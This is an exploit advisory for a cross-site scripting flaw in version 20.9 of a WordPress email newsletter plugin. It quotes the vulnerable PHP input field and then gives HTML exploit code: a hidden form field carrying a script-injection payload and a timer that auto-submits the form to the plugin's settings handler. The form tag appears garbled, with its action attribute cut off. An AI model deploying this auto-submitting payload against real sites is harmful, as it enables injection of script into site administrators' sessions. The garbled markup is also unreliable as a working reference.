######################
# Exploit Title : Wordpress Email newsletter 20.9 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################
######################
# Vulnerable code :
<input name="eemail_from_name" id="eemail_from_name" type="text"
value="<?php echo $eemail_from_name; ?>" maxlength="150" size="50" />
#####################
Exploit Code:
<html>
<body>
<form name="eemail_form" method="post"
_email_setting()" >
<input name="eemail_from_email" id="eemail_from_email" type="hidden"
value='"><script>alert(1)</script>' maxlength="150" size="50" />
<script language="Javascript">
setTimeout('eemail_form.submit()', 1);
</script>
</body>
</html>
